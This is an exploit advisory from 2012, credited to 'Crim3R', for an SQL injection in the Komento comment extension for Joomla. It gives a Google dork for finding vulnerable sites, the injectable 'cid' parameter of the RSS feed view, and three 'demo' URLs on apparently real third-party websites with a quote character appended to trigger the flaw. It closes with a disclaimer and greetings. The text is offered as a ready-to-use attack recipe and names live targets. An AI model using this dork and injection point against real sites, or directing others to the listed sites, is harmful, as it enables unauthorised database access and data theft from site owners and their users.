################################################################################### # Exploit Title: Joomla component komento Sql Inection Vulnerability # # Google Dork:inurl:component/komento/ # # Date: 08/24/2012 # # Author: Crim3R # # Vendor Home : http://stackideas.com/komento.html # # Tested on: all # ################################################################################### $ $        Author will be not responsible for any damage. $ ###################################################################################   ========================================  Komento is a lightweight Joomla comment extension to manage user comments in articles, blogs, and more.    Vulnerability is in Rss Feed :  component/komento/?view=rss&format=feed&component=com_content&cid=[id][sql injection]    D3M0 :    http://keep-it-sexy.com/component/komento/rss?format=feed&component=com_content&cid=152%27    http://www.bonyannew.ir/component/komento/?view=rss&format=feed&component=com_content&cid=52%27    http://www.plazaris.com/component/komento/?view=rss&format=feed&component=com_content&cid=93%27 ===============Crim3R@Att.Net=========== $home = %00 thanks to :  2MzRp - Mikili - 0x0ptim0us - iC0d3R - farbodmahini & Amir